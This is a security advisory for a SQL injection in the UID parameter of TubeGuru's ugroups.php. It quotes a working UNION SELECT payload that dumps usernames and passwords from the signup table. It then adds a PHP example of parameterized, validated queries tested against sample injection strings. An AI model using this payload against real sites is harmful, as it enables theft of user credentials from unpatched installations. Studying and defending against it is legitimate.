Vendor: TubeGuru
By: Hussin X
CVSS: 7.5 (HIGH)
CWE: 89 (SQL Injection)
Product Name: TubeGuru
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008
TubeGuru (ugroups.php UID) Remote SQL Injection Vulnerability
A remote SQL injection vulnerability exists in the UID parameter of TubeGuru's ugroups.php. The value of UID reaches a SQL query unsanitized, so an attacker can inject their own SQL into the application and gain access to sensitive information stored in the database. The published payload is -1 UNION SELECT 1,concat_ws(0x3a,username,pwd),3,4,5,6,7,8,9,10,11,12,13,14,15+from+signup-- which returns the username and pwd columns of the signup table, joined by a colon (0x3a).
Mitigation:
The application should use parameterized queries to prevent SQL injection attacks.
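One way to apply this mitigation to a UID lookup, as an added example that is not TubeGuru's code. The function name fetch_group, the table user_groups and its columns are assumptions, and an in-memory SQLite database with constructed rows stands in for the application's database.

```php
<?php
declare(strict_types=1);

// Hypothetical hardened lookup; not TubeGuru's code. Table and column names are assumed.
function fetch_group(PDO $db, string $rawUid): ?array
{
    // UID is a numeric identifier: reject anything that is not 1-10 digits.
    if (preg_match('/\A[0-9]{1,10}\z/', $rawUid) !== 1) {
        return null;
    }
    // The value travels as a bound parameter, never as part of the SQL text.
    $stmt = $db->prepare('SELECT id, name FROM user_groups WHERE id = :uid');
    $stmt->bindValue(':uid', (int) $rawUid, PDO::PARAM_INT);
    $stmt->execute();
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

// Constructed sample data in an in-memory SQLite database.
// With the MySQL driver, also set PDO::ATTR_EMULATE_PREPARES to false
// so statements are prepared on the server.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE user_groups (id INTEGER PRIMARY KEY, name TEXT)');
$db->exec('CREATE TABLE signup (username TEXT, pwd TEXT)');
$db->exec("INSERT INTO user_groups VALUES (7, 'editors')");
$db->exec("INSERT INTO signup VALUES ('alice', 'constructed-hash')");

// A UNION-style value like the one in the advisory fails validation,
// so it never reaches the query at all.
$inputs = ['7', '-1 UNION SELECT 1,2 from signup--', '7 OR 1=1', ''];
foreach ($inputs as $uid) {
    $row = fetch_group($db, $uid);
    printf(
        "%-38s => %s\n",
        var_export($uid, true),
        $row === null ? 'rejected or not found' : $row['name']
    );
}
```

The integer check and the bound parameter are independent layers: even if the validation were removed, the bound value would be compared as data against the id column and could not change the shape of the query.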